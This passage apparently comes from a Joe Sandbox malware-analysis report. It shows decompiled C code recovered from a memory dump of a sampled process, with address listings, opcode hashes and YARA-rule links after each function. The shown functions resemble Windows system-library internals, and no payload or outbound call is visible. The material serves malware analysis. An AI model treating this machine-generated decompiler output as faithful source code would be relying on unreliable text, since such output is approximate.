											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E00A613C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L00A477F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E00A69650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                                                              0x00a2c608
                                                              0x00a2c615
                                                              0x00a2c625
                                                              0x00a2c62d
                                                              0x00a2c635
                                                              0x00a2c640
                                                              0x00a2c680
                                                              0x00a2c687
                                                              0x00a2c688
                                                              0x00a2c689
                                                              0x00a2c694
                                                              0x00a2c694
                                                              0x00a2c642
                                                              0x00a2c64a
                                                              0x00a2c697
                                                              0x00a97a25
                                                              0x00a97a2b
                                                              0x00a97a2e
                                                              0x00a97a30
                                                              0x00a97bea
                                                              0x00a97bea
                                                              0x00000000
                                                              0x00a97bea
                                                              0x00a97a36
                                                              0x00a97a43
                                                              0x00a97a48
                                                              0x00a97a4c
                                                              0x00a97a4e
                                                              0x00000000
                                                              0x00000000
                                                              0x00a97a58
                                                              0x00a97a5a
                                                              0x00a97a5b
                                                              0x00a97a5c
                                                              0x00a97a5d
                                                              0x00a97a63
                                                              0x00a97a64
                                                              0x00a97a6a
                                                              0x00a97a6c
                                                              0x00a97a6e
                                                              0x00a979cb
                                                              0x00a979cb
                                                              0x00a979ce
                                                              0x00a979d0
                                                              0x00a97a98
                                                              0x00a97a9b
                                                              0x00a97a9b
                                                              0x00a97a9e
                                                              0x00a97aa1
                                                              0x00a97bbe
                                                              0x00a97bbe
                                                              0x00a97bc0
                                                              0x00a97be0
                                                              0x00a97be0
                                                              0x00a97a01
                                                              0x00a97a01
                                                              0x00a97a05
                                                              0x00a97a07
                                                              0x00a97a15
                                                              0x00a97a15
                                                              0x00a97a1a
                                                              0x00000000
                                                              0x00a97a1a
                                                              0x00a97bc2
                                                              0x00a97bc6
                                                              0x00a97bc9
                                                              0x00a97bcd
                                                              0x00a97bcf
                                                              0x00a979e6
                                                              0x00a979e6
                                                              0x00a979eb
                                                              0x00a979eb
                                                              0x00a979ef
                                                              0x00a979f1
                                                              0x00000000
                                                              0x00000000
                                                              0x00a979f3
                                                              0x00a979f5
                                                              0x00a979ff
                                                              0x00a979ff
                                                              0x00000000
                                                              0x00a979ff
                                                              0x00a979f7
                                                              0x00a979fd
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a979fd
                                                              0x00a97bd5
                                                              0x00a97bd8
                                                              0x00000000
                                                              0x00000000
                                                              0x00a97ba9
                                                              0x00a97bac
                                                              0x00a97bb0
                                                              0x00a97bb1
                                                              0x00a97bb1
                                                              0x00a97bb6
                                                              0x00000000
                                                              0x00a97bb6
                                                              0x00a97aa7
                                                              0x00a97aaa
                                                              0x00000000
                                                              0x00000000
                                                              0x00a97ab2
                                                              0x00a97ab3
                                                              0x00a97ab5
                                                              0x00a97aec
                                                              0x00a97aef
                                                              0x00a97b25
                                                              0x00a97b28
                                                              0x00a97b62
                                                              0x00a97b64
                                                              0x00a97b8f
                                                              0x00a97b92
                                                              0x00a97b96
                                                              0x00a97b98
                                                              0x00000000
                                                              0x00000000
                                                              0x00a97b9e
                                                              0x00a97b9f
                                                              0x00a97ba3
                                                              0x00000000
                                                              0x00a97ba3
                                                              0x00a97b66
                                                              0x00a97b68
                                                              0x00a97ae2
                                                              0x00a97ae2
                                                              0x00000000
                                                              0x00a97ae2
                                                              0x00a97b6e
                                                              0x00a97b72
                                                              0x00a97b75
                                                              0x00a97b81
                                                              0x00a97b85
                                                              0x00a97b87
                                                              0x00000000
                                                              0x00000000
                                                              0x00a97b31
                                                              0x00a97b34
                                                              0x00a97b3c
                                                              0x00a97b45
                                                              0x00a97b46
                                                              0x00a97b4f
                                                              0x00a97b51
                                                              0x00a97b57
                                                              0x00a97b59
                                                              0x00a97b59
                                                              0x00000000
                                                              0x00a97b59
                                                              0x00a97b77
                                                              0x00000000
                                                              0x00a97b77
                                                              0x00a97b2a
                                                              0x00000000
                                                              0x00a97b2a
                                                              0x00a97af1
                                                              0x00a97af3
                                                              0x00000000
                                                              0x00000000
                                                              0x00a97afb
                                                              0x00a97afc
                                                              0x00a97afe
                                                              0x00000000
                                                              0x00000000
                                                              0x00a97b00
                                                              0x00a97b03
                                                              0x00000000
                                                              0x00000000
                                                              0x00a97b05
                                                              0x00a97b09
                                                              0x00a97b0d
                                                              0x00a97b0f
                                                              0x00000000
                                                              0x00000000
                                                              0x00a97b18
                                                              0x00a97b1d
                                                              0x00000000
                                                              0x00a97b1d
                                                              0x00a97ab7
                                                              0x00a97ab9
                                                              0x00000000
                                                              0x00000000
                                                              0x00a97abf
                                                              0x00a97ac1
                                                              0x00000000
                                                              0x00000000
                                                              0x00a97ac3
                                                              0x00a97ac6
                                                              0x00000000
                                                              0x00000000
                                                              0x00a97ac8
                                                              0x00a97acc
                                                              0x00a97ad0
                                                              0x00a97ad2
                                                              0x00000000
                                                              0x00000000
                                                              0x00a97adb
                                                              0x00000000
                                                              0x00a97adb
                                                              0x00a979d6
                                                              0x00a979d9
                                                              0x00a979dc
                                                              0x00a97a91
                                                              0x00a97a94
                                                              0x00000000
                                                              0x00a97a94
                                                              0x00a979e2
                                                              0x00000000
                                                              0x00a979e2
                                                              0x00a97a74
                                                              0x00a97a7a
                                                              0x00000000
                                                              0x00000000
                                                              0x00a97a8a
                                                              0x00a97a21
                                                              0x00a97a21
                                                              0x00000000
                                                              0x00a97a21
                                                              0x00a2c650
                                                              0x00a2c651
                                                              0x00a2c656
                                                              0x00a2c65c
                                                              0x00a2c65d
                                                              0x00a2c663
                                                              0x00a2c664
                                                              0x00a2c66a
                                                              0x00a2c66e
                                                              0x00a979c5
                                                              0x00a979c7
                                                              0x00000000
                                                              0x00a979c7
                                                              0x00a2c67a
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dc3b8c324170d04723dfcdc1b1da58322ca64208483141e2a3fce85d483b3898
                                                              • Instruction ID: 872731263ee9930932935d8e0d0a0474b1e6a265ddbd22007635ccc0432afe8e
                                                              • Opcode Fuzzy Hash: dc3b8c324170d04723dfcdc1b1da58322ca64208483141e2a3fce85d483b3898
                                                              • Instruction Fuzzy Hash: BE817C757282019BCF25CF14C881A6EB3E8EF94390F64496AED469B241E730ED45CBB2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00ABB8D0 Relevance: .2, Instructions: 199COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 39%
                                                              			E00ABB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0xb17b9c; // 0x0
				_t124 = L00A44620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E00A69800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E00A695B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E00A695D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L00A477F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E00A69910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E00A695D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0xb17b9c; // 0x0
									_t92 = L00A44620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E00A69910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E00A2A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E00ABE7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E00ABE7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E00A695B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                                              0x00abb8d9
                                                              0x00abb8e4
                                                              0x00000000
                                                              0x00abb8e6
                                                              0x00abb8f3
                                                              0x00abb8f5
                                                              0x00abb8f5
                                                              0x00abb8f8
                                                              0x00abb920
                                                              0x00abb924
                                                              0x00abb936
                                                              0x00abb939
                                                              0x00abb93d
                                                              0x00abb948
                                                              0x00abb9a0
                                                              0x00abb9a0
                                                              0x00abb9a4
                                                              0x00abb9bf
                                                              0x00abb9c4
                                                              0x00abb9c6
                                                              0x00abb9cd
                                                              0x00abb9d1
                                                              0x00abbad4
                                                              0x00abbad8
                                                              0x00abbada
                                                              0x00abbadc
                                                              0x00abbadc
                                                              0x00abbadf
                                                              0x00abbae0
                                                              0x00abbae2
                                                              0x00abbae4
                                                              0x00abbaec
                                                              0x00abbaee
                                                              0x00abbaf0
                                                              0x00abbaf0
                                                              0x00abbaec
                                                              0x00abbafb
                                                              0x00abbafc
                                                              0x00abbafe
                                                              0x00abbb01
                                                              0x00abbb01
                                                              0x00000000
                                                              0x00abbb06
                                                              0x00abb9d7
                                                              0x00abb9db
                                                              0x00abb9db
                                                              0x00abb9de
                                                              0x00abb9de
                                                              0x00abb9e4
                                                              0x00abb9e7
                                                              0x00abb9ea
                                                              0x00abb9ec
                                                              0x00abb9ef
                                                              0x00abb9f3
                                                              0x00abba1b
                                                              0x00abba1b
                                                              0x00abba23
                                                              0x00abba24
                                                              0x00abba27
                                                              0x00abba2a
                                                              0x00abba2b
                                                              0x00abba2e
                                                              0x00abba30
                                                              0x00abba37
                                                              0x00abba3f
                                                              0x00abba9c
                                                              0x00abbaa2
                                                              0x00abbb13
                                                              0x00abbb15
                                                              0x00abbaae
                                                              0x00abbaae
                                                              0x00abbab3
                                                              0x00abbab5
                                                              0x00abbaba
                                                              0x00abbac8
                                                              0x00abbac8
                                                              0x00abbaba
                                                              0x00abbacd
                                                              0x00abbacf
                                                              0x00000000
                                                              0x00abbacf
                                                              0x00abbb1a
                                                              0x00000000
                                                              0x00abbb1c
                                                              0x00abbaa7
                                                              0x00abbb11
                                                              0x00000000
                                                              0x00abbb11
                                                              0x00abbaa9
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00abba41
                                                              0x00abba41
                                                              0x00abba41
                                                              0x00abba58
                                                              0x00abba5d
                                                              0x00abba62
                                                              0x00000000
                                                              0x00000000
                                                              0x00abba64
                                                              0x00abba67
                                                              0x00abba68
                                                              0x00abba69
                                                              0x00abba6c
                                                              0x00abba6f
                                                              0x00abba71
                                                              0x00abba78
                                                              0x00abba80
                                                              0x00000000
                                                              0x00000000
                                                              0x00abba90
                                                              0x00abba90
                                                              0x00abba97
                                                              0x00000000
                                                              0x00abba97
                                                              0x00abb9f5
                                                              0x00abb9f7
                                                              0x00abb9f7
                                                              0x00abb9fa
                                                              0x00abba03
                                                              0x00abba07
                                                              0x00abba0c
                                                              0x00abba10
                                                              0x00abba17
                                                              0x00000000
                                                              0x00abb9f7
                                                              0x00abb9a6
                                                              0x00abb9a8
                                                              0x00abb9af
                                                              0x00abb9b3
                                                              0x00000000
                                                              0x00000000
                                                              0x00abb9b9
                                                              0x00000000
                                                              0x00abb9b9
                                                              0x00abb94d
                                                              0x00abb98f
                                                              0x00abb995
                                                              0x00abb999
                                                              0x00abb960
                                                              0x00abb967
                                                              0x00abb968
                                                              0x00abb96a
                                                              0x00000000
                                                              0x00abb96a
                                                              0x00abb99b
                                                              0x00abb99e
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00abb99e
                                                              0x00abb951
                                                              0x00abb954
                                                              0x00abb95a
                                                              0x00abb95e
                                                              0x00abb972
                                                              0x00abb979
                                                              0x00abb97d
                                                              0x00abb97f
                                                              0x00abb980
                                                              0x00abb982
                                                              0x00abb984
                                                              0x00000000
                                                              0x00abb984
                                                              0x00000000
                                                              0x00abb926
                                                              0x00000000
                                                              0x00abb926

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ec3bf44b88fd3ac39d0550f95b1792e19f2cc876dd46e1c91311940162de2633
                                                              • Instruction ID: 195bfb959751c47846958d7a217556a8869836d625dab8806a4dc5183f2a34a3
                                                              • Opcode Fuzzy Hash: ec3bf44b88fd3ac39d0550f95b1792e19f2cc876dd46e1c91311940162de2633
                                                              • Instruction Fuzzy Hash: A871F032610701EFD731DF28CD45FAAB7B9EB44760F24492CE6558B2A2DBB1E944CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AA6DC9 Relevance: .2, Instructions: 199COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 79%
                                                              			E00AA6DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L00A44620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E00AA6B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E00A47D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E00A69AE0();
					_t87 = L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E00AA795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E00AA795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E00AA795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E00AA795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L00A44620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E00AA6B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E00AA6B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E00AA6B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E00AA6B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E00A47D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E00A69AE0();
								L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L00A42400( &_v36);
							if(_v24 >= 0) {
								_t87 = L00A42400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L00A42400( &_v52);
							}
							if(_v28 >= 0) {
								return L00A42400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                                                              0x00aa6dd4
                                                              0x00aa6dde
                                                              0x00aa6de1
                                                              0x00aa6de3
                                                              0x00aa6de6
                                                              0x00aa6de9
                                                              0x00aa6dec
                                                              0x00aa6def
                                                              0x00aa6df2
                                                              0x00aa6df5
                                                              0x00aa6dfe
                                                              0x00aa6e04
                                                              0x00aa6e09
                                                              0x00aa6e0d
                                                              0x00aa6e18
                                                              0x00aa6e1b
                                                              0x00aa6e22
                                                              0x00aa6e2d
                                                              0x00aa6e30
                                                              0x00aa6e36
                                                              0x00aa6e42
                                                              0x00aa6e4d
                                                              0x00aa6e50
                                                              0x00aa6e55
                                                              0x00aa6e5c
                                                              0x00aa6e6e
                                                              0x00aa6e5e
                                                              0x00aa6e67
                                                              0x00aa6e67
                                                              0x00aa6e73
                                                              0x00aa6e74
                                                              0x00aa6e77
                                                              0x00aa6e7c
                                                              0x00aa6e7d
                                                              0x00aa6e8e
                                                              0x00aa6e93
                                                              0x00aa6e9c
                                                              0x00aa6ea8
                                                              0x00aa6eab
                                                              0x00aa6eac
                                                              0x00aa6eb3
                                                              0x00aa6ecd
                                                              0x00aa6edc
                                                              0x00aa6ee2
                                                              0x00aa6ee5
                                                              0x00aa6ef2
                                                              0x00aa6efb
                                                              0x00aa6f01
                                                              0x00aa6f06
                                                              0x00aa6f0b
                                                              0x00aa6f11
                                                              0x00aa6f1a
                                                              0x00aa6f22
                                                              0x00aa6f26
                                                              0x00aa6f26
                                                              0x00aa6f33
                                                              0x00aa6f41
                                                              0x00aa6f44
                                                              0x00aa6f47
                                                              0x00aa6f54
                                                              0x00aa6f65
                                                              0x00aa6f77
                                                              0x00aa6f7c
                                                              0x00aa6f82
                                                              0x00aa6f91
                                                              0x00aa6f99
                                                              0x00aa6fa3
                                                              0x00aa6fae
                                                              0x00aa6fae
                                                              0x00aa6fba
                                                              0x00aa6fbb
                                                              0x00aa6fbc
                                                              0x00aa6fc1
                                                              0x00aa6fc2
                                                              0x00aa6fd3
                                                              0x00aa6fd8
                                                              0x00aa6fd8
                                                              0x00aa6fdf
                                                              0x00aa6fe8
                                                              0x00aa6fee
                                                              0x00aa6fee
                                                              0x00aa6ff5
                                                              0x00aa6ffb
                                                              0x00aa6ffb
                                                              0x00aa7004
                                                              0x00000000
                                                              0x00aa700a
                                                              0x00aa7004
                                                              0x00aa6eb3
                                                              0x00aa6e9c
                                                              0x00aa7015

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                              • Instruction ID: f7089d9b817d312d2f8c4b89736eef34176651e3c7be7a7b7c8d8638a769b6d3
                                                              • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                              • Instruction Fuzzy Hash: F4717E75E00219EFCB10DFA4CA84AEEBBB9FF89714F144469E505E7291DB30AE41CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A52AE4 Relevance: .2, Instructions: 159COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00A52AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0xb18204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0xb18208; // 0xb18207
				_t8 = _t57 + 0xb18208; // 0xb18207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0xb18450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0xb1821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0xb16d5c; // 0x7ffd0654
							_t72 =  *0xb16d5c; // 0x7ffd0654
							_t75 =  *0xb16d5c; // 0x7ffd0654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0xb16d5c; // 0x7ffd0654
							_t84 =  *0xb16d5c; // 0x7ffd0654
							_t87 =  *0xb16d5c; // 0x7ffd0654
